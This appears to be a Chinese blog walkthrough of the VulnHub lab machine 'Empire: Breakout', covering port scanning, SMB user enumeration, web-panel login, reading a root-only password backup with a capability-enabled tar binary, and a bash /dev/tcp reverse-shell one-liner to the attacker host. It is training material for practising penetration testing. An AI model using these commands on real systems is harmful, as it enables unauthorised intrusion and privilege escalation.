vulnhub-EMPIRE: BREAKOUT
Empire: Breakout ~ VulnHub
靶机:EMPIRE: BREAKOUT
攻击机:
kali linux
Linux kali 5.10.0-kali3-amd64 #1 SMP Debian 5.10.13-1kali1 (2021-02-08) x86_64 GNU/Linux
信息收集
nmap 192.168.1.1/24
nmap -sS -sV -A -p- 192.168.1.107
访问一下80端口
在页面源码的最底部发现了加密字符串。
这个文件很像上一篇文章里的加密。这里就不在赘述解密过程。
解密后:
.2uqPEfj3D<P'a-3
看起来像是密码。暂时先放下。看看其他两个端口。
https://192.168.1.107:10000/
https://192.168.1.107:20000/
这两端口都是登陆界面。
暂时没有思路。刚才只是拿到了密码。
再仔细看namp的扫描结果,看到目标主机开通了445 139端口的smb服务。
这里引入SMB利用命令:enum4linux。
enum4linux 192.168.1.107
发现了一个本地用户:cyber。
再拿之前解密的类似密码的字符串去登陆两个登陆界面。
20000端口的登陆成功。
然后,大家仔细看这里。这不是命令行的标志吗。
点开还真是。
那直接可以执行命令了。
开始收集命令:
这个又类似于一个密码。
再看一下那个可运行的tar文件,这里引入getcap命令。
查看一下。
貌似是任意读取文件的权限。
然后再大佬的指示下,找到了一个可疑文件,貌似是密码备份。但是普通用户没权限打开。这里就用到刚才的tar文件。
./tar -zcf pass.tar /var/backups/.old_pass.bak
再解压一下:
./tar -xvf passwd.tar
看到这个文件就成功了。
好像又是一个密码。
这里我们还需要反弹shell。
开启监听。开始执行shell。
bash -i >& /dev/tcp/192.168.1.108/4321 0>&1
成功弹出shell。
成功提权root。
这里是rOOt,刚开始我看成r00t。
这道题算是比较简单的了。知识点是新学习了getcap命令。
vulnhub-EMPIRE: BREAKOUT相关推荐
- vulnhub——EMPIRE: BREAKOUT
EMPIRE: BREAKOUT 下载地址: https://www.vulnhub.com/entry/empire-breakout,751/ 解压用VMware打开 一.使用nmap进行信息收集 ...
- vulnhub——Empire:Breakout
一.概要 靶机:192.168.1.101 攻击机:192.168.1.113 靶机下载地址:https://download.vulnhub.com/empire/02-Breakout.zip 二 ...
- Vulnhub Empire Breakout
靶场搭建 靶场下载地址:Empire ~ VulnHub 下载下来是虚拟机压缩文件,直接用Vmvare导出就行 打开后把网络模式设置为NAT模式(桥接模式也可以) 开启虚拟机 看到靶机ip为:192. ...
- [渗透测试学习靶机02] vulnhub靶场 Empire: Breakout
kali IP地址为192.168.127.139 靶机 IP地址为192.168.127.141 目录 一.信息搜集 1.1.扫描主机口 1.2.端口扫描 1.3.目录扫描 2.枚举漏洞 2.1.枚 ...
- vulnhub——Empire:LupinOne
一.概要 靶机:192.168.1.115 攻击机:192.168.1.113 下载地址:https://download.vulnhub.com/empire/02-Breakout.zip 二.主 ...
- [渗透测试学习靶机03] vulnhub靶场 Empire LupinOne
Kali 的IP地址:192.168.127.139 靶机的IP地址:192.168.127.142 目录 一.信息搜集 1.1.扫描主机口 1.2.扫描端口 二.Web漏洞利用 2.1.目录遍历 2 ...
- vulnhub Breakout靶机渗透
环境安装好后主页面有ip ip:192.168.171.214 1.信息收集 1.1.1nmap扫描端口 nmap -sV -p- -A -sC 192.168.171.214 在80端口源代码中找到 ...
- EMPIRE: LUPINONE实战演练
文章目录 EMPIRE: LUPINONE实战演练 一.前期准备 1.相关信息 二.信息收集 1.端口扫描 2.访问网站 3.查看源码 4.dirsearch扫描目录 5.访问robots文件 6.访 ...
- 靶机11 Empire Lupin One
总结 本次靶机涉及信息泄露漏洞,系统配置漏洞,sudo 提权 ffuf 工具暴力破解目录 在线识别算法:https://www.dcode.fr/cipher-identifier ssh2john工 ...
最新文章
- [PYTHON] 核心编程笔记(18.多线程编程)
- python webbrowser点击_用 Python 实现手机自动答题,这下百万答题游戏谁也玩不过我!...
- 前端学习(1718):前端系列javascript之生命周期上
- mPaaS:全新移动开发平台,只为打造性能更优越的App
- vm linux数据恢复,VMWARE虚拟机数据恢复
- 2021-08-08 WPF控件专题 StackPanel 控件详解
- 10.认证服务,单点登录
- 知码开门 装箱问题
- nfc门禁卡的复制和迁移
- java短信验证码功能发送的验证码如何校验_如何实现java手机短信验证功能
- 2549. 删除他们! 解题报告
- 成为一名Java后端工程师需要掌握的技能
- iphone4s和iphone5屏幕尺寸的兼容
- python生成中文词云图
- ArcGIS:如何利用栅格数据进行路径网络分析-可达性分析?
- Linux环境 网络流量统计/proc/net/dev和/proc/net/snmp
- 彻底掌握 Promise-原生Promise的实现(二) Promise的链式调用
- X64位驱动保护-隐藏进程躲避游戏检测
- [正则表达式]VBA
- 删除桌面右键菜单AMD Catalyst Control Center选项的方法